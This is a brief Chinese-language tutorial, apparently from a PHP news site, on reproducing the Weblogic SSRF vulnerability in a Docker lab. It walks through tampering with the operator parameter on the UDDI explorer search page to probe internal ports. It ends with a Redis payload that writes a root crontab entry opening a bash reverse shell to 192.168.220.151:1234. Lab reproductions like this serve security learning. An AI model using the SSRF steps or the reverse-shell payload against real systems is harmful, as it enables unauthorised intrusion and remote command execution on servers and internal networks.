如何實現Weblogic SSRF漏洞復現

一、使用docker建置環境

docker安裝及建置環境教學：https://www.freebuf.com/sectool/252257.html

存取7001埠

二、漏洞複現步驟

1、漏洞存在頁面/uddiexplorer/SearchPublicRegistries.jsp

#2、檢查一下IBM這個地方看看

發現是個連接，這就可能存在ssrf了

3、使用burp suite抓包，點選Search

4、修改operator參數的連線

5、存取結果

存取不存在的連接埠傳回 could not connect over HTTP

#存取存在的連接埠回傳狀態碼

#存取內網

利用redis反彈shell的payload

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.220.151/1234 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

以上是如何實現Weblogic SSRF漏洞復現的詳細內容。更多資訊請關注PHP中文網其他相關文章！